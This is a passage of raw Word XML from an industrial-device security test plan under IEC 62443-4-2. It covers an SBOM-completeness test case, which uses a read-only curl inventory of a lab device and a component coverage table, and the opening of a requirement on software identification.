              <w:t>Expected = FAIL: third-party components are not individually exposed and no SBOM exists → confirms G-1; documented as a CR 7.8 completeness shortfall requiring an SBOM (BSI TR-03183 / ISVS V1.1.1).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6ACF36A2" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="00AF57B2" w:rsidRDefault="00254A92" w:rsidP="00254A92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6FC68F" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00254A92">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254A92" w14:paraId="4986225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213065" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D4A615E" w14:textId="77777777" w:rsidR="00254A92"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254A92" w14:paraId="352447C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E089F2" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7618EC0B" w14:textId="0B7AEC5E" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="008F10AA" w:rsidP="008F10AA">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8F10AA">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ006-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00EE7A74" w14:paraId="70F63ACC"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E15E00" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE00A42" w14:textId="32BE1DBD" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="001147A2"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147A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DUT 192.168.0.2; Pi mgmt eth1 = 192.168.50.10; CVE lookup performed off-lab (no lab↔Internet coupling)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00EE7A74" w14:paraId="6DD89E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3AA67C" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3211BEFC" w14:textId="155F3C3F" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="008202F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202FE">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl (inventory); manual coverage table; NVD lookup off-lab; optional GVM/OpenVAS (ifm CM-008) on the HTTP surface only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00EE7A74" w14:paraId="3349473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46070B" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6074CBF3" w14:textId="77777777" w:rsidR="00E064A7" w:rsidRPr="00E064A7"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t># TC-RQ006-02 SBOM-completeness assessment (device side = read-only enumeration)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC11F10" w14:textId="77777777" w:rsidR="00E064A7" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/fieldbussetup/fieldbusfirmware -o TC0602_stack.json # PROFIsafe stack ver</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD19755" w14:textId="77777777" w:rsidR="00E064A7" w:rsidRPr="00E064A7"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t># Coverage table: exposed-version vs known constituent (NOT exposed by device):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15A76EB9" w14:textId="77777777" w:rsidR="00E064A7" w:rsidRPr="00E064A7"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t># uC/OS-II (Micrium) [SRIO-1260] -&gt; NOT exposed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="534F76B0" w14:textId="77777777" w:rsidR="00E064A7" w:rsidRPr="00E064A7"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t># PROFIsafe stack (SIL3) [SRIO-1929] -&gt; partially via fieldbusfirmware</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A8922B8" w14:textId="77777777" w:rsidR="00E064A7" w:rsidRPr="00E064A7"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t># STM32F7 Self-Test Library [SRIO-10766] -&gt; NOT exposed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A05AC15" w14:textId="77777777" w:rsidR="00E064A7" w:rsidRPr="00E064A7"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t># netX90 PROFINET stack [SRIO-1768] -&gt; NOT exposed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8909C9" w14:textId="76A78727" w:rsidR="00254A92" w:rsidRPr="00254A92"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t># derivable versions -&gt; off-lab NVD query; rest -&gt; "un-inventoried"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00EE7A74" w14:paraId="77867A3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E426E" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78873EF0" w14:textId="2779C8D1" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="002F246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F2463">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">| Only the PROFIsafe stack version partially derivable; RTOS/STL/netX90 </w:t>
            </w:r>
            <w:r w:rsidRPr="002F2463">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>versions not exposed → no SBOM, no third-party CVE correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00AD4B09" w14:paraId="2AF3EFE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D0C7C81" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="631154ED" w14:textId="598201F4" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="002F2463"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SBOM absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00EE7A74" w14:paraId="13B66B1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462DCD" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E5811F9" w14:textId="434FF335" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="00680F85"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80F85">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC0602_stack.json, exposed-vs-constituent coverage table, off-lab NVD notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24B5BDDD" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFABAE3" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429D2DDF" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33CA0307" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070BCDB6" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA8E6F5" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C2A41B" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E91BFEB" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA7E928" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A5D353" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771C1809" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8892BD" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C265AC0" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9B0F49" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D6A755" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2824B1AF" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C411AD9" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C834132" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C58BDE4" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718082D4" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4906BF" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C0E630" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F337949" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B024896" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6090639A" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C62312" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F88303E" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4252D6" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634C02CA" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7649E5CB" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B875FE" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F30B857" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C35372" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A78D6CD" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076BE1C9" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3D6637" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F13B6D" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A065CE" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB896E7" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5389EF" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509500E3" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="363B5D12" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9D329A" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E50D26" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B2D12E" w14:textId="2427865F" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">REQUIREMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0FB5F8"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176AC578" w14:textId="7999D1AB" w:rsidR="00276049" w:rsidRPr="00276049" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00276049" w:rsidRPr="00276049">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-007</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762640AA" w14:textId="1AF3EAE9" w:rsidR="00276049" w:rsidRPr="00276049" w:rsidRDefault="00276049">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="00276049">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall be able to provide the identification information of safety-relevant installed software at all times in an easily accessible form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BC32D" w14:textId="3DBB1EB9" w:rsidR="00276049" w:rsidRPr="00276049" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00276049" w:rsidRPr="00276049">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00493DA4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 6.1</w:t>
      </w:r>
      <w:r w:rsidR="002468DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00276049" w:rsidRPr="00276049">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 7.1, CR 7.2</w:t>
      </w:r>
      <w:r w:rsidR="002468DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 7.7</w:t>
      </w:r>
      <w:r w:rsidR="00705C55">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (supporting)</w:t>
      </w:r>
      <w:r w:rsidR="002468DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 7.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB7447" w14:textId="04AA05B2" w:rsidR="00276049" w:rsidRPr="00276049" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
